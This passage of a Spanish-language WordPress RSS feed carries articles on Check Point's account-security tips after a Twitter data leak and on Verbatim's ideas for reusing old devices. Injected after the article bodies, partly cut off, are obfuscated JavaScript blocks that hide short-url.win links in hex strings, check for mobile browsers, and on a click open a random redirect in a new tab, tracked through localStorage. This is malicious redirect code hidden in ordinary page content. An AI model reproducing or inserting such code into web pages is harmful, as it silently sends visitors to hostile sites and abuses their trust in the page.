Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/proteccion-productividad-y-cumplimiento-por-que-las-empresas-necesitan-gestion-de-endpoints-siempre-activa/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">95803</post-id>	</item>
		<item>
		<title>¿Como mantener tus dispositivos y servicios online a salvo?</title>
		<link>https://www.todoenunclick.com/como-mantener-tus-dispositivos-y-servicios-online-a-salvo/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Fri, 12 Aug 2022 22:34:49 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[Check Point]]></category>
		<category><![CDATA[dispositivos]]></category>
		<category><![CDATA[servicios online]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=3031</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2022/08/Hacker-Check-Point.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/Hacker-Check-Point.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/Hacker-Check-Point.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/Hacker-Check-Point.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/Hacker-Check-Point.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/Hacker-Check-Point.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/Hacker-Check-Point.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2022/08/Hacker-Check-Point.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>El 5 de agosto, Twitter revelaba haber sido víctima del ciberataque que logró robar y filtrar los datos de 5,4 millones de usuarios de la plataforma. Aunque no se expusieron contraseñas, los ciberdelincuentes utilizan las direcciones de correo electrónico y los números de teléfono robados para lanzar nuevos ataques.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Check Point® Software Technologies Ltd. (NASDAQ: CHKP), un proveedor líder especializado en ciberseguridad a nivel mundial, alerta del peligro que supone esta filtración y quiere aportar unos consejos primordiales a todas aquellas personas que quieran mantener a salvo su información privada: </p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true} -->
<ol><li><strong>Cuidado con el phishing: </strong>cuando se produce un ciberataque de este tipo, los emails filtrados suelen reutilizarse para enviar campañas de phishing o phishing dirigido (spear phishing) con enlaces fraudulentos. Por ello, es imprescindible extremar las precauciones con todos los correos electrónicos recibidos que contengan enlaces o archivos adjuntos y evitando pinchar en cualquiera de ellos.<strong> </strong>Los ciberdelincuentes utilizan firmas conocidas para ganarse la confianza del usuario. Si, por ejemplo, llega un email del banco lo correcto será acceder a la página del mismo desde el buscador y acceder a la cuenta desde ahí.<strong>&nbsp;</strong></li><li><strong>Contraseñas únicas y seguras:</strong> es imprescindible usar claves diferentes para todas las plataformas de las que se forme parte, ya que en caso de que se produzca el robo de una de ellas el ciberdelincuente tendría acceso a todas las demás, haciendo un daño mucho mayor del esperado. Si además de tener una contraseña diferente para cada servicio esta es robusta y segura se estará mucho más protegido. Mezclar mayúsculas con minúsculas, incluir números y símbolos y cambiarlas de forma periódica son medidas imprescindibles para mantener a los atacantes lejos de cualquier servicio no hackeado.</li><li><strong>Usar la autentificación de doble factor:</strong> esta capa adicional de seguridad hará que para acceder a un servicio además de ingresar la contraseña para iniciar sesión, también haya que añadir un código o una clave de seguridad que llega al dispositivo personal del usuario, lo que que dara un nivel de protección mucho mayor a cualquier cuenta. Siempre que esté disponible se recomienda activarlo, sobre todo si posee integraciones con una aplicación de doble factor.</li><li><strong>Software y actualizaciones al día: </strong>para reducir la superficie de ataque, es muy importante tener actualizadas todas las aplicaciones y herramientas del dispositivo, ya que los fabricantes van reparando sus vulnerabilidades y esto limita a que los atacantes exploten vulnerabilidades conocidas. Por otro lado, para poder protegernos de las vulnerabilidades conocidas todavía no corregidas y ataques desconocidos, es muy importante contar con un software de seguridad de calidad.</li></ol>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>“Los ciberataques no dejan de aumentar cada día. Entre el teletrabajo donde los usuarios a veces acceden desde redes no seguras y que el usuario ahora accede desde más cantidad de dispositivos ampliando las posibilidades de ataque, generaron que los ciberataques aumenten considerablemente, ya que aparecieron nuevas formas para atacar las cuentas de los usuarios. Por este motivo, es imprescindible extremar las precauciones ante cualquier actividad sospechosa y que los usuarios protejan al máximo sus cuentas con las herramientas de seguridad que proveen cada uno de los servicios”, aclara Alejandro Botter, gerente de ingeniería de Check Point para el sur de latinoamérica.</p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/como-mantener-tus-dispositivos-y-servicios-online-a-salvo/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">97262</post-id>	</item>
		<item>
		<title>Cinco ideas para darles una segunda oportunidad a tus viejos dispositivos</title>
		<link>https://www.todoenunclick.com/cinco-ideas-para-darles-una-segunda-oportunidad-a-tus-viejos-dispositivos/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Mon, 15 Nov 2021 20:03:34 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[dispositivos]]></category>
		<category><![CDATA[equipos]]></category>
		<category><![CDATA[ideas]]></category>
		<category><![CDATA[Medioambiente]]></category>
		<category><![CDATA[residuos]]></category>
		<category><![CDATA[segunda oportunidad]]></category>
		<category><![CDATA[Verbatim]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=12</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2021/11/disco-duro-verbatim.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/11/disco-duro-verbatim.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/11/disco-duro-verbatim.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/11/disco-duro-verbatim.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/11/disco-duro-verbatim.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/11/disco-duro-verbatim.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/11/disco-duro-verbatim.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2021/11/disco-duro-verbatim.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>La Argentina registra entre 10 y 12 kilos de residuos de aparatos eléctricos y electrónicos (RAEE) por habitante por año, lo que representa unas 500.000 toneladas anuales. De ellas menos del 10% es reutilizada, según datos de la <a href="https://www.centrobasuracero.com.ar/">Asociación civil Basura Cero.</a></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Mientras que, a nivel global, el último informe de la Plataforma para acelerar la economía circular (PACE) y la coalición de residuos electrónicos de las Naciones Unidas en el planeta observa que los desechos electrónicos llegan a 50 millones de toneladas por año.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Por eso es sumamente importante reutilizar los viejos dispositivos que tenemos olvidados en un cajón del hogar.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Con el objetivo de reciclar y evitar que estos equipos se transformen en desechos Verbatim ofrece cinco ideas para darles una segunda oportunidad e inspirar a los usuarios.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Larga vida al teclado.</strong> ¿Quién no tiene guardado el teclado de una PC antigua? La buena noticia es que con él pueden hacerse varias cosas. Primero hay que desarmarlo con cuidado. Con las teclas se pueden hacer collares formando nombres o frases, imanes de letras para la heladera, pueden transformarse en la tapa de un viejo cuaderno y hasta en un portalápices, con solo pegarlas en una lata.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Las láminas internas, por su parte, se pueden transformar portalámparas. ¿Y el gabinete? En una bandeja para el desayuno o un moderno estante.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Un mouse como cuadro abstracto.</strong> La idea simple. Sólo necesitás un marco de madera, un fondo claro, silicona y un viejo mouse con cable. La clave es poner ingenio en la forma, por ejemplo, hacerlo con la forma de una lamparita. Después pégalo con silicona para que quede sujeto, y eso es todo. ¡Ahora sólo tenés que que colgarlo!</p>
<!-- /wp:paragraph -->

<!-- wp:image {"id":14,"sizeSlug":"full","linkDestination":"none"} -->
<figure class="wp-block-image size-full"><img class="wp-image-14" src="https://www.todoenunclick.com/wp-content/uploads/2021/11/mouse-verbatim.jpg" alt="" /></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p><strong>USB como llave de seguridad.</strong> ¿Tienes pendrives con poca capacidad? Puede servirte para proteger tu computadora. Sólo es necesario que instalar el programa Predator en este dispositivo y comenzar a utilizarlo. ¿Cómo? Es que el programa bloquea las computadoras cuando se extrae el USB. Sólo necesitás ejecutarlo y sacar el dispositivo. Vas a ver como la pantalla se pone negra y se desactivan tanto el teclado como el mouse. Para volver a utilizarlo es necesario volver a conectar el pendrive.</p>
<!-- /wp:paragraph -->

<!-- wp:image {"id":15,"sizeSlug":"full","linkDestination":"none"} -->
<figure class="wp-block-image size-full"><img class="wp-image-15" src="https://www.todoenunclick.com/wp-content/uploads/2021/11/pendrive-verbatim.jpg" alt="" /></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p><strong>Disco duro como almacenamiento externo.</strong> Este componente conectado en el exterior de tu equipo te permitirá hacer copias de seguridad y mover todos sus archivos de una PC a otra. Aunque se venden discos duros externos, antes de gastar dinero puedes ver si tienes lo que necesitás en casa para construir uno.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Eso sí, primero debes chequear el estado de ese disco y su capacidad. Para eso debes realiza un análisis con una herramienta como <a href="http://crystalmark.info/download/index-e.html">CrystalDiskInfo</a>, que podés descargar desde la Web y ejecutarla en tu equipo.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Por último, se encuentra acondicionamiento exterior. Es posible comprar una carcasa o, si sos bueno con las manualidades, puedes realizar una carcasa personalizada con diferentes materiales como madera y cuero.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Aplicaciones portátiles.</strong> Cuando hacemos trabajos en equipo, cuando vamos a la universidad o cuando usamos la computadora de un amigo o familiar podemos utilizar un viejo pendrive para transportar esas aplicaciones que más utilizamos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En estos casos existen suites que pueden utilizarse como PortableApps que puede llevarse en cualquier unidad de almacenamiento y hasta funciona con memorias SD.  De esta manera podrás llevar tu navegador con tus marcadores y extensiones, tu editor de fotos preferido, esa colección de música que escuchas siempre y hasta los videojuegos que más te gustan. Todo lo que necesitas para trabajar y jugar incluso si no tienes tu propia computadora.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Tips para que tus equipos duren más</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Pero más allá de reutilizar los dispositivos también es fundamental alargar su vida útil y para lograrlo es fundamental cuidarlos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Algunos consejos que podemos darte son:</p>
<!-- /wp:paragraph -->

<!-- wp:list {"ordered":true} -->
<ol>
<li><strong>Cargar la batería sólo cuando sea necesario.</strong> Es uno de los componentes que se estropea más rápido por eso es fundamental mantener el nivel de carga entre un 20 y un 80% para que la batería no se esfuerce. Además, deben desconectar los equipos, una vez que hayan completado su carga.</li>
</ol>
<!-- /wp:list -->

<!-- wp:list {"ordered":true,"start":2} -->
<ol start="2">
<li><strong>No exponer los equipos a temperaturas extremas</strong>. Tanto el excesivo calor como las bajas temperaturas pueden dañar tus equipos.</li>
</ol>
<!-- /wp:list -->

<!-- wp:list {"ordered":true,"start":3} -->
<ol start="3">
<li>Si vas a <strong>guardar dispositivos por mucho tiempo</strong> debes apagarlos y dejarlos con el<strong> 50% de la carga</strong>.</li>
</ol>
<!-- /wp:list -->

<!-- wp:list {"ordered":true,"start":4} -->
<ol start="4">
<li><strong>Limpia los puertos de conexiones</strong>. Utiliza un paño limpio y seco. Si vas a limpiarlos con productos debes asegurarte de que sean aptos para dispositivos electrónicos. Eso sí, recuerda desenchufar los aparatos antes de empezar la limpieza y esperar a que se enfríen, si está caliente por su uso.</li>
</ol>
<!-- /wp:list -->

<!-- wp:list {"ordered":true,"start":5} -->
<ol start="5">
<li>Ahora que se acerca el verano y la temporada de playa, es necesarios mantener los <strong>equipos con funda,</strong> porque muchos equipos pueden estropearse con el polvo y la arena.</li>
</ol>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p><strong>Todo suma</strong></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>“Desde Verbatim, realizamos un esfuerzo constante por disminuir el impacto ambiental. Y en ese marco mejoramos constantemente nuestros embalajes para utilizar cada vez menos de plástico, papel y material corrugado”, señala Gabriela Toscanini, Sales Manager LAR South de Verbatim.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Como el tamaño importa al momento de pensar en el impacto ambiental, Verbatim ha revisado cada uno de sus productos para optimizar su embalaje y la utilización de materiales. Entre los cambios que implementó la compañía se encuentran:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul>
<li>Envases de producto del tamaño justo para nuestra línea de productos ópticos</li>
<li>Material de embalaje condensado para la línea de productos HDD</li>
<li>Presentación de un nuevo material de embalaje para pequeños productos de tóner</li>
</ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p><br />“Al sumar todos estos cambios realizados en la totalidad de nuestras líneas de productos, los resultados ambientales son significativos. Reciclar es una responsabilidad de todos. Por eso desde Verbatim queremos ayudarlos e inspirarlos con estos consejos e ideas. Reciclen, reutilicen y sean protagonistas de este cambio que persigue un gran objetivo: ayudar al planeta, la casa que habitamos de todos”, concluye Gabriela Toscanini.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Cinco #ideas para darles una #segundaoportunidad a tus viejos #dispositivos #Verbatim #residuos #medioambiente #equipos</p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const 